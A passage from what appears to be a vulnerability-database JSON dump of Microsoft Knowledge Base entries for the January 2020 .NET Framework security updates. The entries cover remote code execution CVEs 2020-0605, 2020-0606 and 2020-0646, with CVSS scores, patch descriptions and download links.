get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4532936>) website. **File information** For a list of the files that are provided in this update, download the [file information for cumulative update](<https://download.microsoft.com/download/1/2/8/128d5cd3-e60a-4d2a-a9da-48521ec80dee/4532936.csv>). \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mskb", "title": "January 14, 2020-KB4532936 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1803", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0606", "CVE-2020-0646", "CVE-2020-0605"], "modified": "2020-01-14T08:00:00", "id": "KB4532936", "href": "https://support.microsoft.com/en-us/help/4532936", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:39:23", "description": "None\n**Applies to:**Microsoft .NET Framework 3.5 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 \n\n## Summary\n\nA remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. \n \nTo learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\n * [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0606>)\n * [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0646>)\n** Important **\n\n * All updates for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, and 4.7.2 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see [KB 4019990](<https://support.microsoft.com/en-us/help/4019990>).\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4532958](<https://support.microsoft.com/help/4532958>) Description of the Security Only Update for .NET Framework 3.5 for Windows Server 2012 (KB4532958) \n * [4532963](<https://support.microsoft.com/help/4532963>) Description of the Security Only Update for .NET Framework 4.5.2 for Windows Server 2012 (KB4532963) \n * [4532969](<https://support.microsoft.com/help/4532969>) Description of the Security Only Update for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows Server 2012 (KB4532969) \n * [4532950](<https://support.microsoft.com/help/4532950>) Description of the Security Only Update for .NET Framework 4.8 for Windows Server 2012 (KB4532950) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mskb", "title": "Security Only Update for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows Server 2012 (KB4534977)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0606", "CVE-2020-0646", "CVE-2020-0605"], "modified": "2020-01-14T08:00:00", "id": "KB4534977", "href": "https://support.microsoft.com/en-us/help/4534977", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T14:32:11", "description": "None\n**Applies to:**Microsoft .NET Framework 3.5 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 \n\n## Summary\n\nA remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. \n \nTo learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\n * [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0606>)\n * [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0646>)\n** Important **\n\n * All updates for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, and 4.7.2 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see [KB 4019990](<https://support.microsoft.com/en-us/help/4019990>).\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4532943](<https://support.microsoft.com/help/4532943>) Description of the Security and Quality Rollup for .NET Framework 3.5 for Windows Server 2012 (KB4532943) \n * [4532928](<https://support.microsoft.com/help/4532928>) Description of the Security and Quality Rollup for .NET Framework 4.5.2 for Windows Server 2012 (KB4532928) \n * [4532930](<https://support.microsoft.com/help/4532930>) Description of the Security and Quality Rollup for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows Server 2012 (KB4532930) \n * [4532939](<https://support.microsoft.com/help/4532939>) Description of the Security and Quality Rollup for .NET Framework 4.8 for Windows Server 2012 (KB4532939) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mskb", "title": "Security and Quality Rollup for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows Server 2012 (KB4535103)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0646"], "modified": "2020-01-14T08:00:00", "id": "KB4535103", "href": "https://support.microsoft.com/en-us/help/4535103", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:38:55", "description": "None\nRelease Date: \n**January 14, 2020** Version: \n** .NET Framework 4.8**\n\n## Summary\n\nA remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. \n \nTo learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\n * [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0606>)\n * [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0646>)\n\n## Known issues in this update \n\nMicrosoft is not currently aware of any issues in this update. \n\n## How to get this update\n\n**Install this update** This update will be downloaded and installed automatically from Windows Update. \nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4532935>) website. **File information** For a list of the files that are provided in this update, download the [file information for cumulative update](<https://download.microsoft.com/download/1/2/8/128d5cd3-e60a-4d2a-a9da-48521ec80dee/4532935.csv>). \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mskb", "title": "January 14, 2020-KB4532935 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1709", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0606", "CVE-2020-0646", "CVE-2020-0605"], "modified": "2020-01-14T08:00:00", "id": "KB4532935", "href": "https://support.microsoft.com/en-us/help/4532935", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:38:59", "description": "None\nRelease Date: \n**January 14, 2020** Version: \n** .NET Framework 3.5 and 4.8**\n\n## Summary\n\nA remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. \n \nTo learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\n * [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0606>)\n * [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0646>)\n\n## Known issues in this update \n\nMicrosoft is not currently aware of any issues in this update. \n\n## How to get this update\n\n**Install this update** This update will be downloaded and installed automatically from Windows Update. \nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4532938>) website. **File information** For a list of the files that are provided in this update, download the [file information for cumulative update](<https://download.microsoft.com/download/1/2/8/128d5cd3-e60a-4d2a-a9da-48521ec80dee/4532938.csv>). \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mskb", "title": "January 14, 2020-KB4532938 Cumulative Update for .NET Framework 3.5 and 4.8 for Windows 10 Version 1903 and Windows Server 1903 RTM and Windows 10, version 1909 and Windows Server, version 1909", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0606", "CVE-2020-0646", "CVE-2020-0605"], "modified": "2020-01-14T08:00:00", "id": "KB4532938", "href": "https://support.microsoft.com/en-us/help/4532938", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:38:54", "description": "None\nRelease Date: \n**January 14, 2020** Version: \n** .NET Framework 4.8**\n\n## Summary\n\nA remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. \n \nTo learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\n * [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0606>)\n * [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0646>)\n\n## Known issues in this update \n\nMicrosoft is not currently aware of any issues in this update. \n\n## How to get this update\n\n**Install this update** This update will be downloaded and installed automatically from Windows Update. \nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4532933>) website. **File information** For a list of the files that are provided in this update, download the [file information for cumulative update](<https://download.microsoft.com/download/1/2/8/128d5cd3-e60a-4d2a-a9da-48521ec80dee/4532933.csv>). \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mskb", "title": "January 14, 2020-KB4532933 Cumulative Update for .NET Framework 4.8 for Windows 10 version 1607 and Windows Server 2016", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0606", "CVE-2020-0646", "CVE-2020-0605"], "modified": "2020-01-14T08:00:00", "id": "KB4532933", "href": "https://support.microsoft.com/en-us/help/4532933", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:39:24", "description": "None\n**Applies to:**Microsoft .NET Framework 3.5 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 \n\n## Summary\n\nA remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. \n \nTo learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\n * [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0606>)\n * [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0646>)\n** Important **\n\n * As a reminder to advanced IT administrators, updates to .NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2 should only be applied on systems where .NET Framework 3.5 is present and enabled. Customers who attempt to pre-install updates to .NET Framework 3.5 to offline images that do not contain the .NET Framework 3.5 product enabled will expose these systems to failures to enable .NET Framework 3.5 after the systems are online. For more extensive information about deploying .NET Framework 3.5, see [Microsoft .NET Framework 3.5 Deployment Considerations.](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/microsoft-net-framework-35-deployment-considerations >)\n * All updates for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2 require that update KB 2919355 is installed. We recommend that you install update KB 2919355 on your Windows 8.1-based, Windows RT 8.1-based, or Windows Server 2012 R2-based computer so that you receive updates in the future.\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4532961](<https://support.microsoft.com/help/4532961>) Description of the Security Only Update for .NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2 (KB4532961) \n * [4532962](<https://support.microsoft.com/help/4532962>) Description of the Security Only Update for .NET Framework 4.5.2 for Windows 8.1 and Windows Server 2012 R2 (KB4532962) \n * [4532970](<https://support.microsoft.com/help/4532970>) Description of the Security Only Update for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows 8.1 and Windows Server 2012 R2 (KB4532970) \n * [4532951](<https://support.microsoft.com/help/4532951>) Description of the Security Only Update for .NET Framework 4.8 for Windows 8.1 and Windows Server 2012 R2 (KB4532951) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mskb", "title": "Security Only Update for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 8.1 and Windows Server 2012 R2 (KB4534978)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0606", "CVE-2020-0646", "CVE-2020-0605"], "modified": "2020-01-14T08:00:00", "id": "KB4534978", "href": "https://support.microsoft.com/en-us/help/4534978", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T14:32:11", "description": "None\n**Applies to:**Microsoft .NET Framework 3.5 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 \n\n## Summary\n\nA remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. \n \nTo learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\n * [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0606>)\n * [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0646>)\n** Important **\n\n * As a reminder to advanced IT administrators, updates to .NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2 should only be applied on systems where .NET Framework 3.5 is present and enabled. Customers who attempt to pre-install updates to .NET Framework 3.5 to offline images that do not contain the .NET Framework 3.5 product enabled will expose these systems to failures to enable .NET Framework 3.5 after the systems are online. For more extensive information about deploying .NET Framework 3.5, see [Microsoft .NET Framework 3.5 Deployment Considerations.](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/microsoft-net-framework-35-deployment-considerations >)\n * All updates for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2 require that update KB 2919355 is installed. We recommend that you install update KB 2919355 on your Windows 8.1-based, Windows RT 8.1-based, or Windows Server 2012 R2-based computer so that you receive updates in the future.\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4532946](<https://support.microsoft.com/help/4532946>) Description of the Security and Quality Rollup for .NET Framework 3.5 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4532946) \n * [4532927](<https://support.microsoft.com/help/4532927>) Description of the Security and Quality Rollup for .NET Framework 4.5.2 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4532927) \n * [4532931](<https://support.microsoft.com/help/4532931>) Description of the Security and Quality Rollup for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4532931) \n * [4532940](<https://support.microsoft.com/help/4532940>) Description of the Security and Quality Rollup for .NET Framework 4.8 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4532940) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mskb", "title": "Security and Quality Rollup for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4535104)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0646"], "modified": "2020-01-14T08:00:00", "id": "KB4535104", "href": "https://support.microsoft.com/en-us/help/4535104", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:39:25", "description": "None\n**Applies to:**Microsoft .NET Framework 2.0 Microsoft .NET Framework 3.0 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 \n\n## Summary\n\nA remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. \n \nTo learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\n * [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0606>)\n * [CVE-2020-0646](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0646>)\n** Important **\n\n * Starting in August, 2019, updates to .NET Framework 4.6 and above, for Windows Server 2008 SP2, Windows Server 2008 R2 SP1, and Windows 7SP1, require SHA-2 Code signing support. Please make sure that you have all the latest Windows Updates before applying this update to avoid installation issues. For more detailed information about SHA-2 code signing support updates, please see [KB 4474419](<https://support.microsoft.com/en-us/help/4474419/sha-2-code-signing-support-update>).\n * All updates for .NET Framework 4.6 for Windows Server 2008 Service Pack 2 (SP2) require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see [KB 4019990](<https://support.microsoft.com/en-us/help/4019990>).\n * If you install a language pack 